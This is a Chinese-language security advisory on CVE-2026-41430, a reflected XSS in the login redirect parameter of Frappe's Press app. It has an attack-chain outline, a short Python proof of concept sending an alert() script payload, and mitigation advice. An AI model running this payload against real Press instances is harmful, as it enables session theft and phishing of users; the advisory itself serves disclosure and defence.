IPBUF安全漏洞报告
English
CVE-2026-41430 CVSS 6.1 中危

CVE-2026-41430 Press登录页重定向反射型XSS漏洞

披露日期: 2026-04-24
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-41430
漏洞类型
XSS (跨站脚本)
CVSS评分
6.1 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Press (Frappe)

相关标签

XSSReflected XSSCWE-79PressFrappeLogin BypassPhishing

漏洞概述

Press是一款用于运行Frappe Cloud的定制应用,负责管理基础设施、订阅及SaaS服务。该漏洞存在于其登录页面的重定向参数中,由于未对用户输入进行充分过滤,导致存在反射型跨站脚本攻击(XSS)。攻击者可诱导用户点击恶意链接,在受害者浏览器中执行任意JavaScript代码,从而窃取会话令牌或进行钓鱼攻击。

技术细节

该漏洞属于反射型XSS。其根本原因在于应用程序在处理登录逻辑时,直接读取URL中的`redirect`参数,并在未经过适当的上下文编码或验证的情况下将其嵌入到服务器响应的HTML页面中。攻击者可以构造如`?redirect=<script>alert(1)</script>`的恶意URL。当受害者访问此链接时,服务器会将恶意脚本反射回浏览器。由于浏览器信任服务器的响应,该脚本将被执行。根据CVSS向量,攻击无需认证(PR:N),但需要用户交互(UI:R),这使其常被用于社会工程学攻击中劫持用户会话。

攻击链分析

STEP 1
侦察
攻击者识别出目标系统使用了Press应用,并确认其登录页面存在重定向参数。
STEP 2
武器化
攻击者构造包含恶意JavaScript代码的URL,将载荷注入到登录页面的`redirect`参数中。
STEP 3
交付
攻击者通过钓鱼邮件或社交媒体将恶意链接发送给目标用户,诱导其点击。
STEP 4
利用
受害者点击链接访问登录页面,服务器响应中包含未转义的恶意脚本,浏览器解析并执行该脚本。
STEP 5
达成目标
恶意脚本在受害者浏览器中运行,窃取Cookie、Session ID或重定向至伪造的登录页面。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # PoC for CVE-2026-41430 Reflected XSS in Press Login Redirect # Target URL needs to be replaced with the actual instance target_url = "http://target-press-instance/login" # Malicious payload to demonstrate script execution xss_payload = "<script>alert('CVE-2026-41430');</script>" # Constructing the malicious URL with the payload in the redirect parameter exploit_url = f"{target_url}?redirect={xss_payload}" try: response = requests.get(exploit_url) # Check if the payload is reflected unescaped in the response body if xss_payload in response.text: print("[+] Vulnerability confirmed: XSS payload is reflected in the response.") else: print("[-] Vulnerability not confirmed or patch has been applied.") except Exception as e: print(f"[!] Error occurred: {e}")

影响范围

Press < commit 16d1b6ca2559f858a1de77bcb03fd7f1b81671c6

防御指南

临时缓解措施
建议立即升级到包含修复提交的最新版本。如果无法立即升级,应在Web应用防火墙(WAF)中部署规则,检测并拦截包含常见XSS模式(如<script>标签、javascript:伪协议)的`redirect`参数请求,并限制登录后的重定向逻辑仅允许预定义的内部URL路径。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表